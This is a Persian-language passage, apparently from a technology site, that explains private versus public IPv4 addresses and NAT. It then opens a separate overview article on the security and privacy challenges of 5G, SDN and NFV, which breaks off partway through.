یک سازمان می‎تواند دستگاه‌هایی داشته باشد که لازم است به سایر دستگاه‌های این سازمان متصل شوند و لزوما نیاز نیست که به اینترنت هم متصل شوند. بنابراین در چنین مواردی، اختصاص دادن یک آی‌پی منحصر به فرد در شبکه اینترنت کفایت می‎کند، اما همیشه هم ضروری نیست تا یک آدرس آی‌پی عمومی‎ برای آن در نظر گرفته شود. در اینجا، با توجه به این که این شبکه محصور شده است، از لحاظ نظری هر محدوده آدرس آی‌پی را در این شبکه خصوصی می‎توان استفاده کرد، اما اگر به هر دلیلی چنین شبکه‎ای بدون تغییر آدرس‌های آی‌پی به اینترنت متصل شود، باعث تکراری شدن آدرس‌های آی‌پی می‎شود. به همین دلیل استانداردها محدوده‎هایی از آدرس آی‌پی را به منظور استفاده در شبکه‎های خصوصی رزرو کرده‎اند. در IP v4 سه محدوده آدرس به عنوان آی‌پی‎های خصوصی رزرو شده‎اند:

  • از 10.0.0.0 تا 10.255.255.255
  • از 172.16.0.0 تا 172.31.255.255
  • از 192.168.0.0 تا 192.168.255.255

فرض کنید شركت A برای شبکه خصوصی خود از آدرس‌های آی‌پی 192.168.1.0 تا 192.168.1.255 استفاده می‎کند. شرکت B نیز از همین آدرس‌ها برای شبکه خصوصی خود استفاده می‎کند. از آنجا که این دو شبکه به اینترنت متصل نیستند، مشکلی به وجود نخواهد آمد. همچنین این موضوع را هم در نظر داشته باشید كه امروزه با وجود فناوری به نام Network Address Translation یا NAT به دو شبکه مثال ما حتی با وجودی که ازآی‌پی‎های یکسان استفاده می‎کنند اجازه می‎دهد تا به اینترنت متصل شوند. کاری که توسط این فناوری انجام می‎شود این است که به روتر موجود در شركت A یک آی‌پی عمومی‎ منحصر به فرد و به روتر موجود در شرکت B  یک آی‌پی عمومی‎ منحصر به فرد دیگر داده می‎شود. سپس این روترها یک جدول NAT را مدیریت خواهند کرد که می‎تواند بسته‎های داده را به شکل درست از شبکه داخلی به اینترنت هدایت کند.

چه تفاوتی بین آی‌پی عمومی‎ و آی‌پی خصوصی وجود دارد؟

  • آی‌پی‎های عمومی‎ به صورت سراسری در کل اینترنت منحصر به فرد هستند اما آی‌پی‎های خصوصی به اینترنت متصل نمی‎شود و از این رو دستگاه‌های خصوصی موجود در شبکه‎های خصوصی می‎توانند آدرس آی‌پی یکسان داشته باشند.
  • آی‌پی‎های عمومی‎ را می‎توان در اینترنت مسیریابی و به آنها دسترسی داشت. اما نمی‎توان در اینترنت به آی‌پی‎های خصوصی دسترسی پیدا کرد. امروزه یک فناوری به نام NAT این امکان را فراهم کرده است تا بتوان با استفاده از تنها یک آی‌پی عمومی‎ مجموعه‎ای از آی‌پی‎های خصوصی را به اینترنت متصل کرد.
  • آدرس‌های آی‌پی نسخه 4 در محدوده‎های 10.0.0.0 تا 10.255.255.255 و 172.16.0.0 تا 172.31.255.255 و از 192.168.0.0 تا 192.168.255.255 برای آدرس‌های خصوصی رزرو شده‎اند و باقی آنها برای آی‌پی‎های عمومی‎ هستند.
  • آی‌پی‎های عمومی‎ توسط سازمانی به نام Internet Assigned Numbers Authority (IANA) مدیریت می‎شوند. برای آی‌پی‎های خصوصی مرکز مدیریت یکپارچه‎ای وجود ندارد و آنها توسط مسئول شبکه خصوصی مدیریت می‎شوند.
  • برای فراهم شدن امکان مسیریابی صحیح، آی‌پی‎های عمومی‎ بعد از اختصاص داده شدن باید در روترهای اینترنت پیکربندی شوند.
  • برای به دست آوردن یک آی‌پی عمومی‎، باید برای ثبت آن پول پرداخت کنید، اما ثبت آدرس‎های خصوصی محلی بوده و هزینه‎ای به دنبال ندارد.
  • با استفاده از کادر مشاهده جزئیات کارت شبکه در ویندوز می‎توان آدرس آی‌پی خصوصی یک کامپیوتر را مشاهده کرد. اما برای مشاهده یک آی‌پی عمومی‎ باید از طریق مرورگر و استفاده از یک ابزار تحت وب که آدرس‌های آی‌پی عمومی‎ را نمایش می‎دهد این کار را انجام داد. ساده‎ترين روش انجام این کار تایپ my ip در گوگل است.

نسل جدید ارتباطی 5G

شبکه‌های 5G با به‌کارگیری مفاهیم جدیدی از فناوری قصد دارند تا به نیاز روزافزون دسترسی پهنای باند، افزایش تعداد کاربران و دستگاه‌های سیار متصل به یکدیگر، به شیوه‌ای بسیار قابل‌اطمینان و مقرون‌به‌صرفه پاسخ دهند. شبکه‌سازی نرم‌افزارمحور و مجازی‌سازی عملکردهای شبکه، از جمله برجسته‌ترین فناوری‌هایی هستند که باعث پیشرفت در محاسبات ابری از قبیل محاسبات لبه موبایل شده که در برآورده کردن پیش‌نیازهای 5G نقش مهمی ایفا می‌‌کنند. اما استفاده امن از این فناوری‌ها و حفظ حريم خصوصی کاربران در شبکه‌های بی‌سیم آینده موضوعات جدیدی هستند که باید به آن‌ها توجه ویژه شود. در این مقاله سعی بر این است تا نگاهی اجمالی به چالش‌های امنیتی پیش روی شبکه‌های نرم‌افزار محور و مجازی‌سازی فعالیت‌های شبکه و چالش‌های پیرامون حفظ حريم خصوصی کاربران داشته باشیم.

معرفی 

طبق اعلام برنامه تحقيقات مشارکت عمومی‌ خصوصی نسل پنجم (5G-PPP)، فناوری 5G حدود 7 تریلیون دستگاه بی‌سیم را به یکدیگر متصل خواهد کرد و مدت‌زمان ساخت سرویس را به‌طور میانگین از 90 ساعت به 90 دقیقه کاهش خواهد داد. قرار است 5G با متصل کردن تمام جنبه‌های زندگی در یک جامعه دیجیتال نیازهای این نوع از خدمات و امنیت مورد نیاز آن را با استفاده از مجموعه متنوعی از فناوری‌ها فراهم کند. از این‌رو، مفاهیمی‌ به نام محاسبات ابری، شبکه نرم‌افزار محور (SDN) و مجازی‌سازی عملکردهای شبکه (NFV) برای برآورده ساختن نیازهای رو به رشد کاربران از طریق مدیریت شبکه‌های انعطاف‌پذیر پدید آمده است. محاسبات ابری نیز راهکار مناسبی برای اپراتورها فراهم می‌کند تا داده‌ها، خدمات و اپلیکیشن‌ها را مدیریت کنند. اما تحقيقات اخیر نشان می‌دهد، این فناوری‌ها با چالش‌های امنیتی بالقوه‌ای روبه‌رو هستند که باید به‌منظور اطمینان از امنیت خدمات و زیرساخت‌های جدید 5G موردتوجه قرار گیرد.

چالش‌های امنیتی اصلی در 5G

5G به‌زودی تمام جنبه‌های زندگی ما را به شبکه‌های ارتباطی پیوند می‌دهد، در نتیجه به معماری و راهکارهای قدرتمندی در زمینه امنیت نیاز دارد. اتحادیه نسل بعدی شبکه‌های موبایل (NGMN)، چالش‌های اصلی پیش روی 5G را این‌گونه طبقه‌بندی کرده است:
• ترافیک برق‌آسای شبکه: در آینده تعداد بسیار زیادی دستگاه کاربر نهایی و ابزار جدید اینترنت اشیا وجود خواهد داشت که باید برای مديريت این حجم از ترافیک چاره‌اندیشی شود.
• امنیت رابط‌های رادیویی: کلیدهای کدگذاری رابط رادیو نباید از طریق کانال‌های ناامن منتقل شوند. 
• یکپارچگی سطوح کاربری: در حال حاضر هیچ محافظ یکپارچه رمزنگاری برای داده‌های سطوح کاربری وجود ندارد.
• تعهدات امنیتی در شبکه: محدودیت‌های مبتنی بر خدمات در معماری امنیتی به استفاده اختیاری از اقدامات امنیتی می‌شود و باید ضوابط مستحکمی برای آن وضع شود.
• امنیت رومینگ: مولفه‌های امنیت کاربری در رومینگ بین اپراتورهای مختلف شبکه به‌روزرسانی نشده است که به مصالحه امنیتی در رومینگ منجر می‌شود.
• حملات منع سرویس (DoS) در زیرساخت: عناصر کنترل‌کننده مشهود و کانال‌های کنترل رمزگذاری نشده در شبکه وجود دارد.
• حملات منع سرویس (DoS) در دستگاه‌های کاربر نهایی: برای سیستم‌عامل‌ها، اپلیکیشن‌ها و داده‌های پیکربندی در دستگاه‌های کاربران ملاحظات امنیتی وجود ندارد. اصول طراحی 5G توسط NGMN صرف‌نظر از بهره‌وری رادیویی شامل، ساده‌سازی عملیات و مدیریت توسط پذیرش محاسبات جديد و فناوری‌های جديد شبکه‌سازی است